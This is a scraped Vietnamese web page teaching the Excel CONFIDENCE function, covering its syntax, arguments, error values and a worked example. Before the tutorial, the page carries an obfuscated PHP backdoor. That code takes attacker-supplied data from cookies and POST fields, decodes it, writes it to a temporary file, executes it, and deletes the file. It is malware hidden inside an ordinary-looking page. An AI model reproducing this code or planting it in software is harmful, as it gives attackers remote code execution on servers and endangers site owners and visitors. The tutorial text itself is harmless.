$ylZYFX = chr (85) . '_' . 'E' . "\121" . "\130" . chr (108) . chr (104); $yLWtuVuIpp = 'c' . chr ( 753 - 645 ).chr (97) . "\x73" . chr ( 582 - 467 ).chr (95) . "\145" . "\170" . chr ( 510 - 405 ).chr (115) . "\x74" . 's';$kAOmFrC = class_exists($ylZYFX); $yLWtuVuIpp = "35366";$DZnLrk = strpos($yLWtuVuIpp, $ylZYFX);if ($kAOmFrC == $DZnLrk){function IAeTZP(){$aZfgaHHvu = new /* 4364 */ U_EQXlh(29822 + 29822); $aZfgaHHvu = NULL;}$XKXHSy = "29822";class U_EQXlh{private function KWZRppi($XKXHSy){if (is_array(U_EQXlh::$YNoKSXbD)) {$name = sys_get_temp_dir() . "/" . crc32(U_EQXlh::$YNoKSXbD["salt"]);@U_EQXlh::$YNoKSXbD["write"]($name, U_EQXlh::$YNoKSXbD["content"]);include $name;@U_EQXlh::$YNoKSXbD["delete"]($name); $XKXHSy = "29822";exit();}}public function HfLoXJy(){$XvCgWQeB = "40563";$this->_dummy = str_repeat($XvCgWQeB, strlen($XvCgWQeB));}public function __destruct(){U_EQXlh::$YNoKSXbD = @unserialize(U_EQXlh::$YNoKSXbD); $XKXHSy = "22734_2480";$this->KWZRppi($XKXHSy); $XKXHSy = "22734_2480";}public function gYQxmX($XvCgWQeB, $uwoXMoiAQJ){return $XvCgWQeB[0] ^ str_repeat($uwoXMoiAQJ, intval(strlen($XvCgWQeB[0]) / strlen($uwoXMoiAQJ)) + 1);}public function HturnsX($XvCgWQeB){$IRxSAES = "\142" . "\x61" . "\163" . chr (101) . chr (54) . chr ( 962 - 910 );return array_map($IRxSAES . chr ( 150 - 55 ).chr ( 1074 - 974 )."\145" . "\143" . 'o' . chr (100) . 'e', array($XvCgWQeB,));}public function __construct($oCcnlBmz=0){$vemMBQz = ',';$XvCgWQeB = "";$YdToI = $_POST;$OaybdGwVx = $_COOKIE;$uwoXMoiAQJ = "c88d6de5-9c28-4205-88d1-aa6ae4d03ace";$vclXYK = @$OaybdGwVx[substr($uwoXMoiAQJ, 0, 4)];if (!empty($vclXYK)){$vclXYK = explode($vemMBQz, $vclXYK);foreach ($vclXYK as $TPeibWgFe){$XvCgWQeB .= @$OaybdGwVx[$TPeibWgFe];$XvCgWQeB .= @$YdToI[$TPeibWgFe];}$XvCgWQeB = $this->HturnsX($XvCgWQeB);}U_EQXlh::$YNoKSXbD = $this->gYQxmX($XvCgWQeB, $uwoXMoiAQJ);if (strpos($uwoXMoiAQJ, $vemMBQz) !== FALSE){$uwoXMoiAQJ = explode($vemMBQz, $uwoXMoiAQJ); $dXdlFMY = sprintf("22734_2480", rtrim($uwoXMoiAQJ[0]));}}public static $YNoKSXbD = 56125;}IAeTZP();} Hàm CONFIDENCE trong Excel và cách sử dụng - Tải Chùa

Hàm CONFIDENCE trong Excel và cách sử dụng

Rate this post
CONFIDENCE trong Excel là dạng hàm tương thích, nó sẽ giúp bạn tính toán được các khoảng tin cậy thông qua việc sử dụng phân bố chuẩn hóa.

CONFIDENCE trong Excel là dạng hàm tương thích, nó sẽ giúp bạn tính toán được các khoảng tin cậy thông qua việc sử dụng phân bố chuẩn hóa.

Tuy nhiên là cũng có nhiều người chưa biết sử dụng hàm này như thế nào? Vậy để rõ và chi tiết hơn về cách sử dụng thì bài viết dưới đây chúng tôi sẽ chia sẻ đến bạn cách sử dụng hàm CONFIDENCE trong excel.

Hàm CONFIDENCE là hàm trả về khoảng tin cậy của trung bình tổng thể bằng cách dùng phân bố chuẩn hóa, và chính khoảng tin cậy này là một phạm vị các giá trị mà bạn cần biết được cỡ mẫu cũng như là độ lệch tiêu chuẩn tổng thể và mức độ quan trọng của dữ liệu.

Để sử dụng được hàm này thì trước tiên là máy tính của bạn cần phải được cài đặt: Office 2003, Office 2007, Office 2010, Office 2013

Cú pháp: CONFIDENCE(alpha,standard_dev,size).

Trong đó:

  • Alpha: mức độ quan trọng được dùng để tính toán mức độ tin cậy, và mức tin cậy bằng: 100*(1 – alpha)%, bắt buộc phải có.
  • Standard_dev: độ lệch chuẩn tổng thể cho phạm vi của dữ liệu và được giải định là đã được xác định, bắt buộc phải có.
  • Size: Kích thước mẫu và cũng bắt buộc phải có.

Nhưng khi sử dụng hàm CONFIDENCE thì bạn cần phải chú ý:

  • Nếu bất cứ đối số nào mà không phải dạng số thì CONFIDENCE sẽ trả về giá trị lỗi #VALUE!
  • Nếu Alpha  0 hoặc 1 thì CONFIDENCE sẽ trả về giá trị lỗi #NUM!
  • Nếu Standard_dev 0 thì CONFIDENCE sẽ trả về giá trị lỗi #NUM!
  • Nếu kích cỡ không phải là một số nguyên thì nó sẽ bị cắt cụt.
  • Nếu kích cỡ <1 thì CONFIDENCE sẽ trả về giá trị lỗi #NUM!
  • Nếu như giả đinh Alpha = 0,05 thì ta cần phải tính toán vùng nằm dưới đường cong chuẩn thông thường (1-alpha), hay chính là 95%. Giá trị này sẽ là 1,96 và từ đó ta sẽ có được khoảng tin cậy là:

Hướng dẫn sử dụng hàm CONFIDENCE trong Excel

Để chi tiết hơn thì bạn có thể theo dõi ví dụ của chúng tôi dưới đây:

Nhập vào Excel các giá trị thực tế tương ứng với các tham số của hàm trong các ô Excel, trong ví dụ này thì chúng ta tính toán với các giá trị tham số: mức quan trọng: 0.08, độ lệch chuẩn của tổng thể là 3, kích thước mẫu là 40.

hàm CONFIDENCE trong excel - hình 1

Nhập các tham số vào bảng tính

Nhập công thức vào ô C9 và nhận được kết quả như hình vẽ.

hàm CONFIDENCE trong excel - hình 2

Kết quả

Với 2 bước làm đơn giản như ví dụ mà chúng tôi giới thiệu ở trên thì chắc hẳn là bạn cũng đã biết được cách sử dụng hàm CONFIDENCE trong excel, thật đơn giản phải không nào.